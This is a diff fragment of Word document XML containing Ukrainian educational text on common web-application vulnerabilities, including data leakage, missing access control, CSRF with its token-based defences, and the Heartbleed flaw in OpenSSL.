+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>6. Витік вразливих даних</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web-додаток повинен правильно працювати з уразливими даними і захищати їх. Для запобігання витоку даних в процесі їх обробки, передачі і зберігання необхідно забезпечувати захист на всіх рівнях за допомогою надійних процедур контролю доступу, загальновизнаних криптоалгоритмів і методів управління ключами шифрування.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">7. Відсутність контролю доступу до функціонального </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>івня</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Користувачі, що працюють з </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-додатком, можуть мати </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні рівні повноважень. У </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>таких</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Якщо захист привілейованих функцій полягає лише в тому, що вони просто заховані в коді програми, то зловмисник, скомпрометував</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ши</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>іковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>8. Підробка міжсайтових запитів (CSRF)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Підробка міжсайтових запитів (cross-site request forgery, CSRF) заснована на тому, що аутентиф</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ікованого користувача Web-додатку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обманним</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> шляхом змушують запустити шкідливий сценарій, який виконує дії від імені законного користувача. Наприклад, на комп'ютері користувача може таємно виконуватися CSRF-сценарій, що відправляє Web-додатком запит на зміну пароля, а після успішної авторизації користувача Web-додаток виконує цей запит.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>використання випадкових імен п</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>олів в різних формах Web-додатку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, що робить неможливим створення зловмисником працюючого сценарію.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">9. Використання </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>компонентів з відомими уразливостями</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Будь-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>який сторонній компонент Web-додатку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - будь то двійковий або вихідний код, комерційн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ий</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> або Open Source-додаток - повинен перевірятися на відсутність вразливостей.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Практично кожен</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Web-додаток використовує Open Source-компоненти, наприклад, бібліотеку OpenSSL, що забезпечує TLS / SSH-шифрування Web-сайтів (HTTPS). У квітні 2014 року в декількох версіях цієї бібліотеки була виявлена критична вразливість CVE-2014-0160, відома як Heartbleed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
